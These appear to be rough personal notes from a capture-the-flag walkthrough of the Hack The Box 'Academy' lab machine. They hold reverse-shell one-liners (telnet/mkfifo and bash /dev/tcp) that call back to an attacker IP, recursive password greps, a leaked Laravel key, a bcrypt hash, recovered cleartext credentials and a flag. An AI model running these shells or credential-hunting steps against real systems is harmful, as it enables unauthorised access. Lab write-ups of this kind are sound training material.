Academy
admin admin notworking
added to etc/hosts
logged in with created account after changing role id to 1, admin pass
added dev-staging-01.academy.htb to etc hosts
admin@htb
"base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=โ
hmm not reading
http://dev-staging-01.academy.htb
also set as rhost
bunch of users not finding where
find /home -iname user.txt
found the flag under another user
TF=$(mktemp -u);mkfifo $TF && telnet **10.10.14.2** 8888 0<$TF | **sh** 1>$TF
stty raw -echo
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/9999 0>&1'
grep -iRl passw ../
finally got a better shell with this
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/9999 0>&1'
grep -iRl passw ../
../sbin/deluser
../sbin/pam-auth-update
../sbin/pwck
../sbin/grub-install
../sbin/pwconv
../sbin/newusers
../sbin/cryptsetup-reencrypt
../sbin/grub-macbless
../sbin/groupdel
../sbin/chgpasswd
../sbin/unix_update
../sbin/cpgr
../sbin/init
../sbin/iscsistart
../sbin/grpunconv
../sbin/useradd
../sbin/grub-probe
../sbin/sshd
../sbin/usermod
../sbin/shadowconfig
../sbin/mysqld
../sbin/userdel
../sbin/vipw
../sbin/groupadd
../sbin/ldconfig.real
../sbin/telinit
../sbin/applygnupgdefaults
../sbin/grub-bios-setup
../sbin/poweroff
../sbin/halt
../sbin/reboot
../sbin/pam_extrausers_update
../sbin/iw
../sbin/grpconv
../sbin/visudo
../sbin/runlevel
../sbin/dmidecode
../sbin/grpck
../sbin/addgnupghome
../sbin/delgroup
../sbin/iscsiadm
../sbin/plymouthd
../sbin/groupmod
../sbin/hdparm
../sbin/groupmems
../sbin/chpasswd
../sbin/addgroup
../sbin/ethtool
../sbin/update-passwd
../sbin/grub-mkconfig
../sbin/pam_extrausers_chkpwd
../sbin/logrotate
../sbin/shutdown
../sbin/tcpdump
../sbin/iscsid
../sbin/cppw
../sbin/vigr
../sbin/pwunconv
../sbin/sulogin
../sbin/adduser
../sbin/apache2
../sbin/cron
../sbin/cryptsetup
../sbin/unix_chkpwd
../etc/login.defs
../etc/services
../etc/rc2.d/S01mysql
../etc/fwupd/remotes.d/lvfs-testing.conf
../etc/fwupd/redfish.conf
../etc/default/nss
../etc/default/useradd
../etc/debconf.conf
../etc/alternatives/rview
../etc/alternatives/from
../etc/alternatives/nc
../etc/alternatives/view
../etc/alternatives/nawk
../etc/alternatives/vimdiff
../etc/alternatives/awk
../etc/alternatives/vi
../etc/alternatives/pinentry
../etc/alternatives/rsh
../etc/alternatives/pftp
../etc/alternatives/php
../etc/alternatives/ex
../etc/alternatives/netcat
../etc/alternatives/ftp
../etc/alternatives/vim
../etc/alternatives/rlogin
../etc/alternatives/rvim
../etc/pam.d/su-l
../etc/pam.d/newusers
../etc/pam.d/common-password
../etc/pam.d/passwd
../etc/pam.d/sshd
../etc/pam.d/chsh
../etc/pam.d/other
../etc/pam.d/login
../etc/pam.d/chfn
../etc/pam.d/polkit-1
../etc/pam.d/chpasswd
../etc/pam.d/su
../etc/pam.d/common-session
../etc/sos/sos.conf
../etc/logcheck/ignore.d.server/mysql-server-8_0
../etc/logcheck/ignore.d.workstation/mysql-server-8_0
../etc/rc4.d/S01mysql
../etc/vmware-tools/vm-support
../etc/rpc
../etc/ssl/openssl.cnf
../etc/bindresvport.blacklist
../etc/overlayroot.conf
../etc/rc3.d/S01mysql
../etc/adduser.conf
../etc/apparmor.d/usr.lib.snapd.snap-confine.real
../etc/apparmor.d/abstractions/nameservice
../etc/apparmor.d/abstractions/authentication
../etc/apparmor.d/abstractions/ubuntu-browsers.d/java
../etc/rc0.d/K01mysql
../etc/hdparm.conf
../etc/rc6.d/K01mysql
../etc/ssh/ssh_config
../etc/ssh/sshd_config
../etc/nsswitch.conf
../etc/php/7.4/cli/php.ini
../etc/php/7.4/apache2/php.ini
../etc/rc5.d/S01mysql
../etc/mysql/my.cnf.fallback
../etc/rc1.d/K01mysql
../etc/init.d/mysql
../etc/security/namespace.init
../etc/apache2/sites-available/default-ssl.conf
../etc/apache2/apache2.conf
cat /etc/apache2/apache2.conf
cat /etc/init.d/mysql
cat /etc/apache2/sites-available/default-ssl.conf
cat ../etc/apache2/apache2.conf
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/8888 0>&1'

we i got here
idky this didnt run the first time
../.env
../.env.example
../bootstrap/cache/services.php
../resources/lang/en/passwords.php
../database/migrations/2014_10_12_100000_create_password_resets_table.php
../database/migrations/2014_10_12_000000_create_users_table.php
../database/factories/UserFactory.php
../config/cache.php
../config/mail.php
../config/database.php
../config/auth.php
../config/hashing.php
../config/app.php
'$2y$10$TKh8H1.PfQx37YgCzwiKb.KjNyWgaHb9cbcoQgdIVFlYg7B77UdFmโ
$faker
cry0l1t3
cry0l1t3
mySup3rP4s5w0rd!!
got linpeas running
๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ๐จ
[+] Checking for TTY (sudo/su) passwords in audit logs
- 08/12/20 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
- 08/12/20 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
/var/log/audit/audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
/var/log/auth.log.1:Feb 9 14:22:44 academy sudo: root : TTY=tty1 ; PWD=/tmp/tmp.oJH3D2iQM2 ; USER=mrb3n ; COMMAND=/usr/bin/sudo -K
/var/log/auth.log.1:Feb 9 14:23:27 academy sudo: root : TTY=tty1 ; PWD=/tmp/tmp.oJH3D2iQM2 ; USER=root ; COMMAND=sudoedit /
/var/www/html/academy/database/factories/UserFactory.php:$2y$10$TKh8H1.PfQx37YgCzwiKb.KjNyWgaHb9cbcoQgdIVFlYg7B77UdFm
/var/www/html/htb-academy-dev-01/database/factories/UserFactory.php:$2y$10$TKh8H1.PfQx37YgCzwiKb.KjNyWgaHb9cbcoQgdIVFlYg7B77UdFm
mrb3n
mrb3n_Ac@d3my!

composer gtfo bin
copy pasta command && link
522133fcb02e225be276127788fd46c8



























































